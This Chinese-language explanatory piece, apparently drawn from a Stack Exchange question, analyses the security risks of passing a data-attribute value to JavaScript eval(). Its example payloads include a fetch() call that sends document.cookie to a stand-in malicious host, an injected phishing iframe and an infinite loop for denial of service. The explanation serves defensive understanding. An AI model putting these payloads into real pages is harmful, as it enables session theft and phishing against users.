JavaScript中eval()执行data属性值的风险及恶意行为分析
该场景下的恶意攻击风险
XSS注入引发任意代码执行:如果攻击者能够篡改页面的
data-css-prop-mutator-changer-param属性值(比如通过未过滤的用户输入渲染到页面、前端DOM篡改漏洞等途径),将其替换为恶意代码字符串,例如fetch('https://恶意地址/steal?cookie=' + document.cookie),或者document.body.innerHTML = '<iframe src="钓鱼页面"></iframe>',eval执行后会直接在用户浏览器中运行这些代码,进而窃取用户敏感数据、伪造用户操作、劫持页面控制权。上下文信息窃取与篡改:你的eval代码运行在Controller类update方法的上下文环境中,攻击者可以通过恶意代码访问
this.element、e.detail等上下文对象,比如修改页面关键DOM结构、篡改事件参数,甚至通过全局window对象修改页面其他功能逻辑,破坏原有业务流程。拒绝服务攻击:攻击者可以注入无限循环(如
while(true){})、大量占用内存的代码,导致页面卡顿、浏览器崩溃;或者删除页面核心DOM元素、篡改全局样式,让页面完全无法正常使用,造成服务不可用。
内容的提问来源于stack exchange,提问作者gremo
相关产品推荐
相关产品推荐

